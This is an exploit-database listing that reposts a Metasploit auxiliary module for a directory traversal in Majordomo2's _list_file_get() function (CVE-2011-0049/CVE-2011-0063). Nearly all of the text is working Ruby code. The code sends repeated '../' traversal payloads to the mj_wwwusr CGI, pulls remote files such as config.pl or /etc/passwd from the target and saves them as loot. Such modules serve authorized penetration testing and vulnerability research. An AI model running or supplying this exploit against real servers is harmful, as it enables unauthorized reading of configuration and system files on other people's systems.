Exploit for Majordomo2 _list_file_get() Directory Traversal CVE-2011-0049 CVE-2011-0063

Name: Exploit for Majordomo2 _list_file_get() Directory Traversal CVE-2011-0049 CVE-2011-0063
Rating: 5 (70 reviews)
2024-09-01 | CVSS 5.0
## https://sploitus.com/exploit?id=PACKETSTORM:181051
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Majordomo2 _list_file_get() Directory Traversal',  
'Description' => %q{  
This module exploits a directory traversal vulnerability present in  
the _list_file_get() function of Majordomo2 (help function). By default, this  
module will attempt to download the Majordomo config.pl file.  
},  
'Author' => ['Nikolas Sotiriu'],  
'References' =>  
[  
['OSVDB', '70762'],  
['CVE', '2011-0049'],  
['CVE', '2011-0063'],  
['URL', 'https://www.sotiriu.de/adv/NSOADV-2011-003.txt'],  
['EDB', '16103']  
],  
'DisclosureDate' => 'Mar 08 2011',  
'License' => MSF_LICENSE  
)  
  
register_options(  
[  
OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", 'config.pl']),  
OptString.new('URI', [true, 'Majordomo vulnerable URI path', '/cgi-bin/mj_wwwusr/domain=domain?user=&passw=&func=help&extra=']),  
OptInt.new('DEPTH', [true, 'Define the max traversal depth', 8]),  
])  
end  
  
def run_host(ip)  
trav_strings = [  
'../',  
'./.../'  
]  
uri = normalize_uri(datastore['URI'])  
file = datastore['FILE']  
deep = datastore['DEPTH']  
file = file.gsub(/^\//, "")  
  
trav_strings.each do |trav|  
str = ""  
i = 1  
while (i <= deep)  
str = trav * i  
payload = "#{str}#{file}"  
  
res = send_request_raw(  
{  
'method' => 'GET',  
'uri' => uri + payload,  
}, 25)  
  
if res.nil?  
print_error("#{rhost}:#{rport} Connection timed out")  
return  
end  
  
print_status("#{rhost}:#{rport} Trying URL " + payload )  
  
if (res and res.code == 200 and res.body)  
if res.body.match(/\<html\>(.*)\<\/html\>/im)  
html = $1  
  
if res.body =~ /unknowntopic/  
print_error("#{rhost}:#{rport} Could not retrieve the file")  
else  
file_data = html.gsub(%r{(.*)<pre>|<\/pre>(.*)}m, '')  
print_good("#{rhost}:#{rport} Successfully retrieved #{file} and storing as loot...")  
  
# Transform HTML entities back to the original characters  
file_data = file_data.gsub(/\&gt\;/i, '>').gsub(/\&lt\;/i, '<').gsub(/\&quot\;/i, '"')  
  
store_loot("majordomo2.traversal.file", "application/octet-stream", rhost, file_data, file)  
return  
end  
else  
print_error("#{rhost}:#{rport} No HTML was returned")  
end  
else  
# if res is nil, we hit this  
print_error("#{rhost}:#{rport} Unrecognized #{res.code} response")  
end  
i += 1;  
end  
end  
  
print_error("#{rhost}:#{rport} Not vulnerable or the DEPTH setting was too low")  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout  
rescue ::Timeout::Error, ::Errno::EPIPE  
end  
end